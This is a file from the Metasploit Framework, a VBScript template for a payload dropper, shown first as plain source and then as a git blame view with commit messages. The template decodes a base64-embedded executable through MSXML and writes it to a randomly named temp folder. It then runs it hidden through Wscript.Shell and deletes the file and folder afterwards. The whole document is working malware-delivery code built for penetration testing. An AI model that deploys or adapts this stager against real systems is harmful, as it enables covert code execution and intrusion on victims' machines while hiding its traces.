metasploit-framework/data/templates/scripts/to_exe.vbs.template

Function %{var_decodefunc}(%{var_decodebase64})
	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
		%{var_decodebase64} & "</B64DECODE>"
	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
	%{var_xmldoc}.LoadXML(%{var_xml})
	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
	set %{var_xmldoc} = nothing
End Function

Function %{var_func}()
	%{var_shellcode} = "%{base64_shellcode}"
	Dim %{var_obj}
	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
	Dim %{var_tempdir}
	Dim %{var_basedir}
	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
	%{var_obj}.CreateFolder(%{var_basedir})
	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
	Dim %{var_shell}
	Set %{var_shell} = CreateObject("Wscript.Shell")
	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
	%{var_adodbstream}.Type = 1
	%{var_adodbstream}.Open
	%{var_adodbstream}.Write %{var_decoded}
	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
	%{var_shell}.run %{var_tempexe}, 0, true
	%{var_obj}.DeleteFile(%{var_tempexe})
	%{var_obj}.DeleteFolder(%{var_basedir})
End Function

%{init}
Use MSXML decoder instead 2016-03-25 13:52:16 +00:00			`Function %{var_decodefunc}(%{var_decodebase64})`
			`%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _`
			`"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _`
			`%{var_decodebase64} & "</B64DECODE>"`
			`Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")`
			`%{var_xmldoc}.LoadXML(%{var_xml})`
			`%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue`
			`set %{var_xmldoc} = nothing`
			`End Function`

Commit adding the template scripts. 2013-08-20 23:52:58 +00:00			`Function %{var_func}()`
Send base64ed shellcode and decode with certutil 2016-03-01 01:48:25 +00:00			`%{var_shellcode} = "%{base64_shellcode}"`
Commit adding the template scripts. 2013-08-20 23:52:58 +00:00			`Dim %{var_obj}`
			`Set %{var_obj} = CreateObject("Scripting.FileSystemObject")`
			`Dim %{var_tempdir}`
			`Dim %{var_basedir}`
			`Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)`
			`%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()`
			`%{var_obj}.CreateFolder(%{var_basedir})`
Update to_exe.vbs.template Rename values 2013-10-21 12:49:09 +00:00			`%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"`
Commit adding the template scripts. 2013-08-20 23:52:58 +00:00			`Dim %{var_shell}`
			`Set %{var_shell} = CreateObject("Wscript.Shell")`
Use MSXML decoder instead 2016-03-25 13:52:16 +00:00			`%{var_decoded} = %{var_decodefunc}(%{var_shellcode})`
			`Set %{var_adodbstream} = CreateObject("ADODB.Stream")`
			`%{var_adodbstream}.Type = 1`
			`%{var_adodbstream}.Open`
			`%{var_adodbstream}.Write %{var_decoded}`
			`%{var_adodbstream}.SaveToFile %{var_tempexe}, 2`
Commit adding the template scripts. 2013-08-20 23:52:58 +00:00			`%{var_shell}.run %{var_tempexe}, 0, true`
Fix minor indenting issue 2016-03-01 02:50:56 +00:00			`%{var_obj}.DeleteFile(%{var_tempexe})`
Commit adding the template scripts. 2013-08-20 23:52:58 +00:00			`%{var_obj}.DeleteFolder(%{var_basedir})`
			`End Function`

Use MSXML decoder instead 2016-03-25 13:52:16 +00:00			`%{init}`